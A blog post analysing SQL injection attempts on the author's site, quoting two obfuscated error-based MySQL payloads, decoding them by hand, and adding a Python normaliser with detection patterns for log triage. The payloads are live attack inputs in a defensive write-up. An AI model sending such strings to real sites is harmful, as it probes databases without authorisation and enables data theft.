Macrotone Blogs


SQL Injection Attacks

We are experiencing a spate of SQL injection attacks upon our site.

These take the form of SQL fragments appended to the end of otherwise valid URLs. A simple Google search reveals many sites where the examples given below have triggered problems. Two typical strings are shown below:

(/**/sElEcT+1+/**/fRoM(/**/sElEcT+count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT+/**/uNhEx(/**/hEx(/**/cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21))))+/**/fRoM+information_schema/**/tAbLeS+/**/lImIt+0,1),floor(rand(0)*2))x+/**/fRoM+information_schema/**/tAbLeS+/**/gRoUp/**/bY+x)a)

Or

+or+1=(/**/sElEcT+1+/**/fRoM(/**/sElEcT+count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT+/**/uNhEx(/**/hEx(/**/cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21))))+/**/fRoM+information_schema/**/tAbLeS+/**/lImIt+0,1),floor(rand(0)*2))x+/**/fRoM+information_schema/**/tAbLeS+/**/gRoUp/**/bY+x)a)+and+1=1

As one can see, the code is specifically targeting MySQL databases (both strings read from MySQL's information_schema). We presume that, if successful, they would then make further attempts to obtain more information in order to mount a more specifically targeted attack.


Note also the use of mixed case in the SQL strings, an attempt to bypass the simple pattern-matching tests that may or may not be in place to detect this type of attack.

Looking at the first example in more detail, we can first convert the hexadecimal strings to text and change the case of the obvious SQL keywords to make for easier reading:

Converting the strings gives: 0x4142433134355a5136324457514146504f4959434644 converts to: 'ABC145ZQ62DWQAFPOIYCFD'

And 0x217e21 becomes: '!~!'

This gives us the following:

(/**/select+1+/**/from(/**/select+count(*),/**/concat((/**/select(/**/select+/**/unhex(/**/hex(/**/concat('!~!', 'ABC145ZQ62DWQAFPOIYCFD', '!~!'))))+/**/from+information_schema/**/tables+/**/limit+0,1),floor(rand(0)*2))x+/**/from+information_schema/**/tables+/**/group/**/by+x)a)

The next step is to change the ‘+’ signs to spaces, since in a URL query string a ‘+’ encodes a space and here simply separates the words.

(/**/select 1 /**/from(/**/select count(*),/**/concat((/**/select(/**/select /**/unhex(/**/hex(/**/concat('!~!', 'ABC145ZQ62DWQAFPOIYCFD', '!~!')))) /**/from information_schema/**/tables /**/limit 0,1),floor(rand(0)*2))x /**/from information_schema/**/tables /**/group/**/by x)a)

Take out the ‘/**/’ comment blocks [why add the comment blocks at all, since they contribute nothing to the SQL other than, perhaps, some form of obfuscation?] and we start to see something more sensible:

(select 1 from(select count(*), concat((select(select unhex(hex(concat('!~!', 'ABC145ZQ62DWQAFPOIYCFD', '!~!')))) from information_schema tables limit 0,1),floor(rand(0)*2))x from information_schema tables group by x)a)

It is ironic that there appear to be syntax errors in the original source (two of which are identical!).

We are not yet sure what the significance of the hex strings is.
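The unwrapping above was done by hand; the following is an added example (not code from the original post or from Macrotone) that performs the same steps in Python so that a log-review script or a simple signature can match a request regardless of the case and comment tricks: URL-decode the ‘+’ signs, strip the /**/ comments, fold the mixed case, and decode the 0x hex literals into quoted strings. The two payloads are the ones quoted in the post (the second is the first wrapped in "+or+1=(...)+and+1=1"); the benign query string, the indicator names and the detection patterns are my own constructed choices.

```python
import re
import urllib.parse

# The two payloads quoted in the post, exactly as they appear in the URL.
# The second is the first wrapped in "+or+1=(...)+and+1=1".
PAYLOAD_1 = (
    "(/**/sElEcT+1+/**/fRoM(/**/sElEcT+count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT+"
    "/**/uNhEx(/**/hEx(/**/cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,"
    "0x217e21))))+/**/fRoM+information_schema/**/tAbLeS+/**/lImIt+0,1),floor(rand(0)*2))x"
    "+/**/fRoM+information_schema/**/tAbLeS+/**/gRoUp/**/bY+x)a)"
)
PAYLOAD_2 = "+or+1=" + PAYLOAD_1 + "+and+1=1"

# Constructed benign Joomla-style query string, used as a control.
BENIGN = "option=com_content&view=article&id=42"

INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
HEX_LITERAL = re.compile(r"\b0x([0-9a-f]+)\b")   # applied after lower-casing

# Heuristic indicators (names are my own), checked against the normalised text.
INDICATORS = {
    "select_from": r"\bselect\b.*\bfrom\b",
    "information_schema": r"\binformation_schema\b",
    "error_based_groupby": r"floor\(rand\(0\)\*2\)",
    "tautology": r"\b(and|or)\s+\d+=\d+\b",
}


def _decode_hex(match):
    """Turn a MySQL 0x... literal into a quoted string; leave odd-length or non-ASCII ones alone."""
    digits = match.group(1)
    if len(digits) % 2:
        return match.group(0)
    try:
        text = bytes.fromhex(digits).decode("ascii")
    except UnicodeDecodeError:
        return match.group(0)
    return "'" + text.replace("'", "''") + "'"


def normalize(raw):
    """Undo the obfuscation layers in the same order the post unwraps them by hand."""
    s = urllib.parse.unquote_plus(raw)             # '+' (and any %xx) back to literal characters
    s = INLINE_COMMENT.sub(" ", s)                 # /**/ adds nothing to the SQL; treat as whitespace
    s = re.sub(r"\s+", " ", s).strip().lower()     # collapse whitespace, fold the mixed case
    return HEX_LITERAL.sub(_decode_hex, s)         # 0x... -> '...' (decoded text keeps its own case)


def classify(raw):
    """Return the normalised text, the indicator names that fired, and any quoted literals."""
    norm = normalize(raw)
    return {
        "normalized": norm,
        "indicators": [name for name, pat in INDICATORS.items() if re.search(pat, norm)],
        "literals": re.findall(r"'((?:[^']|'')*)'", norm),
    }


if __name__ == "__main__":
    for label, p in (("payload 1", PAYLOAD_1), ("payload 2", PAYLOAD_2), ("benign", BENIGN)):
        r = classify(p)
        print(label, r["indicators"], r["literals"])
        print("  ", r["normalized"])
```

Run as a script it prints, for the first payload, the literals ['!~!', 'ABC145ZQ62DWQAFPOIYCFD', '!~!'] and the normalised query beginning "( select 1 from( select count(*), concat((", which is the form reached by hand above. Two practical notes: unhex(hex(x)) returns x unchanged, so the value the inner concat assembles is simply '!~!ABC145ZQ62DWQAFPOIYCFD!~!', and if the site ever surfaces raw database errors to the client it is worth searching the web server and PHP logs for that decoded marker, since its appearance in a response body would show that a request of this kind actually reached the database. The indicator patterns are triage signals rather than block rules; "select ... from" will also fire on ordinary English typed into a search box.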

There is something very sad about a situation where certain individuals have nothing better to do with their time than waste it trying to disrupt others' efforts to disseminate information and share knowledge with those interested in improving themselves. Even more so since, if they crafted the SQL themselves, they have a certain amount of SQL skill which could be put to better use.
